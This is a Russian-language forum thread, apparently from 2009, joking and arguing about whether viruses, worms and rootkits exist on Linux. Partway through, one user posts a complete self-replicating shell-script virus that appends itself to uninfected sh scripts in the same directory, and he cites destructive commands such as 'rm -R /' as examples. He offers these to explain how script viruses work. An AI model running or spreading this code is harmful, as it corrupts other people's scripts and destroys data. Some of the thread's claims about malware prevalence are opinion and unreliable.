Вирусы в Linux

[Firebird]

<graveworm> предлогаю приятелю переходить на линукс

<graveworm> он очень боица вирусов

<webster> да в линуксе стоит бояцо их)))

<webster> их же целых 9 ))))

<webster> и то половина не работает

<webster> с остальной половиной надо ебацо чтобы установить

[Ineu]

БОР переезжает на линухру?

[Hans R. Steiner]

Кстати, а у кого-нибудь есть вирус для линукс?

Я уже семь лет ищу сие чудо

[tiger_by]

самый главный вирус это кривые ручки

[AlexzAK]

Я тоже хочу вирус!

Уже 3ий месяц все работает и никакой активности вирусов

Я скучаю по ним

[lcd_swat]

А что?! Я вот видел вирус в NIX! Вот прям своими глазами! Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe. Я даже сохранил у себя его, так, на всякий пожарный. И так, что мы имеем - вирус в линуксе быть может, а работать....хм...под wine что ли попробовать

[molodoy]

А они что реально существуют??????

[Firebird]

Есть, конечно, но их нужно долго устанавливать ))

[AccessD]

ага, wine'ом

[Moin]

кто ЛОР читал на баше не смеётся!

[AndreyMust19]

Hans R. Steiner

у кого-нибудь есть вирус для линукс?

AlexzAK

Я тоже хочу вирус!

Вирусы в Linux есть и не только в нем, но, как говорится - их мало. Мое мнение - гораздо опасней не бинарные (к-е будут запускаться только на узком числе машин), а скриптовые. Причины:

- sh или bash установлен на всех машинах

- эти оболочки во всех UNIX устроены одинаково

- в системе есть достаточно консольных программ не только для обычных гадостей, но и для вирусов.

Вот скажите. Вы скачали sh-скрипт, который распаковывает tar-gz архив. При этом вы запускаете его от root'а. А где гарантия, что в нем какой-нибудь вредоносной команды, вроде 'rm -R /', которая туда была вставлена умышленно? И в результате запуска оного скрипта вы остаетесь у разбитого корыта. Даже если вы запускаете его не от рута, команда 'rm -R $HOME/*' принесет пользователю много вреда - удалит все его файлы и настройки.

Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II" (по-моему есть на www.wasm.ru). Вот пример очень простого sh-вируса:

#!/bin/sh

#Вирус "sh-450". Удалите эту и строку и "exit", чтобы вирус мог получить управление.

exit

for F in *

do

#Если в первой строке найдено "#!" и "/sh", значит $F - sh-скрипт

if [ "$(head -c9 "$F" | grep -s -E -H "#!" 2>/dev/null)" != "" ]; then #This $F - a Script

if [ "$(head -c9 "$F" | grep -s -E -H "/sh" 2>/dev/null)" != "" ]; then #$F - a sh-Script

if [ "$(tail -n1 "$F" 2>/dev/null)" != "#Virus v.1.1" ]; then #$F - not infected

tail -12 $0 >> "$F" 2>/dev/null;

fi

fi

fi

done

#Virus v.1.1

Этот скрипт ищет в текущем каталоге все не зараженные sh-скрипты (в конце к-х нет '#Virus v.1.1') и копирует в их конец последние 12 строчек своего тела. Это очень простой пример. Есть еще полиморфные и закодированные вирусы, и такие, у к-х умышленно усложнен алгоритм чтобы ни пользователи, ни антивирусы не поняли алгоритм его работы.

lcd_swat

Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe.

AccessD

ага, wine'ом

Нет, это - Windows-гадости, к UNIX они не имеют никакого отношения! Бинарных вирусов, скомпилированных для Linux всего-лишь 50-60. Мне неизвестно - сколько скриптовых.

Не стоит думать что если в UNIX нет вирусов - то она безопасна. В этой системе другая раскладка сил. Для размножения вирусов чтобы программа была запущена от root'а. Размножение вирусов практически ограничено потому что никто не будет от root'а запускать офисную или прикладную программу, - в основном запускаются те, к-е были созданы во время установки системы. В Windows 98% юзеров сидят под администратором, поэтому любая запущенная программа может писать в другую программу.

А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows, несмотря на то, что даже Linux встречается в тысячи раз реже, чем Windows. Черви спокойно существуют в UNIX-системах (хотя бы про червь Морриса все слышали - поражал BSD 4), есть черви Slapper и Scalper. Во-первых играет роль наличие исходников уязвимых программ, во-вторых, заплатки выпускаются реже (посмотрите на FreeBSD - 1/3 дыр еще не закрыта , хотя для некоторых из них уже есть эксплоиты). И в-третьих, сами заплатки устанавливаются реже - их установка и новых версий гораздо проблематичнее:

1) установка программ в UNIX дольше и сложнее, чем в Windows

2) после обновления программы может потребоваться обновление других программ, вплоть до ядра.

В UNIX также более распространены руткиты (скрывающие свое присутствие в системе). В Windows они практически не нужны - ведь все программы в 98% случаев итак запускаются от Администратора.

Итак, под UNIX никогда не будет много бинарных вирусов (а вот скриптовых - может быть больше). А вот новые черви и руткиты будут гораздо более знаменитыми.

Так что... не огорчайтесь - на каждую старуху своя пруха!

[AccessD]

Цитата:

Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II"

попадалась несколько лет назад.. вода водой, человеку видать писать уже нечего было, вот и решил ещё куда-нибудь залезть.

[Legalizer]

2 AndreyMust19

Мужчина, вы серьезны как рак легких в своих рассуждениях. Теперь внимание вопрос: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вот пользуюсь системой с 2001 года. Последние года три-четыре GNU/Linux у меня стоит дома и на работе. И при этом я лично не сталкивался с какими либо вирусами и т.п. Я что-то делаю не так?

Вот об этом и были все ШУТКИ в этом топике (а мы с вами в разделе "Юмор" назодимся, если что)

Но вы все же смогли удачно пошутить. В частности, имеется в виду фраза: "А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows". Это развеселило.

И еще нужно понимать, что запуск чего бы то ни было от root - это довольно неумное действие. Тем более в вашем примере (когда скачал невесть что и давай его пускать от рута не глядя). А вот если будете пускать от пользователя, то масштабы бедствия ограничатся проблемами в домашней директории пользователя и директориями, на которые он имеет права на запись. При этом сама система не навернется. А вы ведь делаете регулярные бэкапы, да? Следовательно и восстановить пользовательскую директорию не проблема, да?

[Hans R. Steiner]

Вайт, ты просто линуксом пользоваться не умеешь... по этому у

тебя и вырусов нет... ты не умеешь их правильно искать и

запускать (видимо, я тоже не умею... за шесть лет практически

полного необщения с виндовсом, разучился... все навыки

растерял)

кстати:

http://ru.wikipedia.org/wiki/Список_компьютерных_вирусов_и_ч ервей_под_Linux

Но... лично я, вживую, ни одного не видел... и на самом деле, я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один, хотя бы в конкретной, отдельно взятой системе

[Legalizer]

ГГ

Видимо так и есть

[AccessD]

To Legalizer, Hans R. Steiner:

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй )))

Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" ))

[Hans R. Steiner]

Спациально нашел статью этого страуса

"Что бы там не говорили фанатики UNIX, но вирусы размножаются и на этой платформе. Отмахиваться от этой проблемы – означает уподобиться страусу. Вы хотите быть страусами? Я думаю – нет!"

http://xakforum.ru/index.php?topic=107.0

"Если на машине постоянно обновляется большое количество программного обеспечения (в том числе и создаваемого собственными силами), привилегии на модификацию исполняемых файлов становятся просто необходимы, в противном случае процесс общения с компьютером из радости рискует превратиться в мучение."

Ч..еловек, из страха перед большой птицей, решил заняться поиском привидений и охотой на ведьм

В общем, если почитать статью, хохма на хохме, косяк на косяке, а Касперский - страус

[Ineu]

AccessD писал(а) Mon, 09 March 2009 20:38

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй ))) Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" ))

Человеку деньги надо зарабатывать, а Вы шутки шутите!

[AndreyMust19]

Legalizer

Цитата:

вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок).

Цитата:

Это развеселило.

А я - серьезно.

AccessD

Цитата:

вода водой,

я не советую эту статью, я вам ее назвал только чтобы е возникали вопросы "откуда ты это узнал?".

Hans R. Steiner

Цитата:

я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один

Вот поэтому я и говорю - забудьте о вирусах! Есть черви и руткиты.

[Hans R. Steiner]

Черви - в ту же стопку, что и вирусы

Руткиты - для этого надо сперва заиметь доступ к моим

системам... а сие, с целью установки руткитов, рискованно для

здоровья

В общем, если взять любую, даже самую тупую книгу по

информационной безопасности, Вы там сможете найти на первых же

страницах, что если на Вас кто-то положит глаз, максимум что Вы

сможете сделать - довести систему до уровня, когда взлом будет

нерентабельным с точки зрения соотношения затрат к выгоде... все

остальные случаи - либо кривые руки админа, либо сказки на

ночь... забудьте... вирусов и червей под линукс нет, а те что

есть и при этом у Вас работают, написаны специально для Вас, а

если так, Вам терять уже нечего

[Legalizer]

AndreyMust19 писал(а) Wed, 11 March 2009 00:08

Legalizer Цитата: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT). Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок).

Так на вопрос вы не ответили Был такой вирус в вашей жизни?

А пугать меня вам не положено. Это же форум в интернетах, а их я не очень боюсь

[cppmm]

Весело.

Тут вот такой замечательный скриптик был приведён... А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск? Ну и ещё повеселило описание про сложность обновления системы... Неужели apt-get update && apt-get dist-upgrade в кроне раз в неделю сложнее, чем обновление всего софта, что есть в оффтопике руками? Что-то с трудом верится.

А что касается вирусов под никсы в общем, нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут. Шесть из них я не смог скомпилить, а оставшиеся три не запустились.

[AndreyMust19]

Legalizer

Цитата:

Так на вопрос вы не ответили

Нет, не видел, но:

Если я это не вижу, то не означает что этого не существует.

P.S. а правильный вирус и не должен делать так, чтобы его видели.

cppmm

Цитата:

А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск?

А зачем нам скрипт без этого атрибута? Конечно не тут же, почитать сначала надо - что он делает. Но ведь скрипт можно написать так, что смысла его никто не поймет (как язык Си). Но запутанность алгоритма скрипта - не признак его зараженности. Ведь есть еще "упаковщики" языков, которые уменьшают размер скрипта / исходника:

- убирая все комментарии, лишние пробелы и табуляцию

- изменяет имена переменных, меток, функций на более короткие

- возможно даже переименовывает типы (н-р unsigned char -> uc, а unsigned long -> ul).

Цитата:

нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут.

Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас

Цитата:

руки не из того места растут

или сами вирусы написаны немультиплатформенными (привязаны к определенной версии системы).

[AccessD]

Цитата:

Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас

А вам известно, что собирался он на строго определённой платформе?

[Legalizer]

2 AccessD

Видимо нет.

А ведь в первом сообщении этого топика все написано:

"<webster> и то половина не работает

<webster> с остальной половиной надо ебацо чтобы установить"